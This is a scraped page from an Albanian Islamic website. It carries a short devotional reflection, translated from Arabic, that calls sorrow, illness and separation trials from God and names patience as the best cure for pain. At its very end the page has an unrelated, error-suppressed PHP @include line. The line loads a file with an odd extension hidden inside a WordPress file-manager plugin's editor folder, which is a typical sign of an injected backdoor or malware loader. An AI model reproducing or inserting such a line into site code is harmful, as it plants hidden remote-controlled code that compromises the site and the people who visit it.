Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

ILAÇI MË I MIRË PËR QETËSIMIN E DHEMBJEVE

ILAÇI MË I MIRË PËR QETËSIMIN E DHEMBJEVE

ilaci
Dije se, Allahu kur të sprovon me diçka, vetëm se në të ka hajr për ty, edhe nëse ti e mendon të kundërtën e saj!
Mërzia është sprovë.
Nostalgjia është sprovë.
Ndarja është sprovë.
Sëmundja është sprovë.
Çdo gjë e cila të mundon,
dhe të turbullon çiltërsinë e jetës tënde,
dhe ta loton syrin, është sprovë!
E ti, mos e harro premtimin e Allahut: “Prandaj, përgëzoji të duruarit”. Bekare 155.
Ky është ilaçi më i mirë për qetësimin e dhembjeve!
Nga arabishtja: Irfan JAHIU

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";